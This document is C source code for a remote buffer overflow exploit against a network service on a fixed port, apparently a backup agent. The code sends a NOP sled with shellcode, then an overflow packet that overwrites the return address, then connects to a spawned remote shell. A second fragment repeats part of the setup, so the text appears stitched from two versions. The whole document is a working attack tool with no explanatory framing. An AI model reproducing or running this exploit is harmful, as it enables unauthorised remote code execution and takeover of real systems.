int main( int argc, char **argv) { /* first 2 bytes are a type 74 request */ /* last two bytes length */ char head[] = "\x00\x4a\x00\x03\x00\x01\xff\xff"; char data[512]; char sc_req[20000]; char *host; unsigned int tnum; unsigned int safeaddr; unsigned int ret; int datalen = LEN; int port = ARK_PORT; unsigned int addr = 0; int sock_overflow, sock_nops, sock_shell; int i; if (argc == 3) { host = argv[1]; tnum = atoi(argv[2]); if (tnum > NUMTARGS || tnum == 0) { fprintf(stderr, "[!] Invalid target\n"); usage(argv[0]); } } else { usage(argv[0]); } tnum--; ret = targets[tnum].targret; safeaddr = targets[tnum].targsafe; sock_overflow = sock_nops = sock_shell = 0; sock_nops = isock(host, port); sock_overflow = isock(host, port); // build data section of overflow packet memset(data, 0x90, datalen); for (i = 0; i < datalen; i += 4) memcpy(data+i, (char *)&ret, 4); // we overwrite a pointer that must be a valid address memcpy(data+datalen-12, (char *)&safeaddr, 4); // build header of overflow packet datalen = ntohs(datalen); memcpy(head+6, (char *)&datalen, 2); // build invalid packet with nops+shellcode memset(sc_req, 0x90, NOP_LEN+1); memcpy(sc_req+NOP_LEN, shellcode, sizeof(shellcode)); // send invalid nop+shellcode packet fprintf(stderr, "[*] Sending nops+shellcode\n"); write(sock_nops, sc_req, NOP_LEN+sizeof(shellcode)); fprintf(stderr, "[*] Done, sleeping\n"); sleep(1); close(sock_nops); // send overflow fprintf(stderr, "[*] Sending overflow\n"); write(sock_overflow, head, HEAD_LEN); write(sock_overflow, data, LEN); fprintf(stderr, "[*] Done\n"); fprintf(stderr, "[*] Sleeping and connecting remote shell\n"); sleep (1); close(sock_overflow); // connect to shell sock_shell = isock(host, SHELL_PORT); fprintf(stderr, "[*] Success, enjoy\n"); getshell(sock_shell); }
unsigned int retaddr; unsigned int safe; int datalen = 0; int port = ARK_PORT; int sock_overflow, sock_nops; int i; int nullmap = 0; sock_overflow = sock_nops = 0; retaddr = targets[tnum].targret; safe = targets[tnum].targsafe; datalen = targets[tnum].len; sock_nops = isock(host, port); if (sock_nops < 1) exit(-1); fprintf(stderr, "[*] Connected to %s:%d NOP+shellcode socket\n", host, port); sock_overflow = isock(host, port); if (sock_overflow < 1) exit(-1); fprintf(stderr, "[*] Connected to %s:%d overflow socket\n", host, port); // build data section of overflow packet memset(data, NOP, DATA_LEN); // copy in return address memcpy(data+datalen - 8, (char *)&retaddr, 4);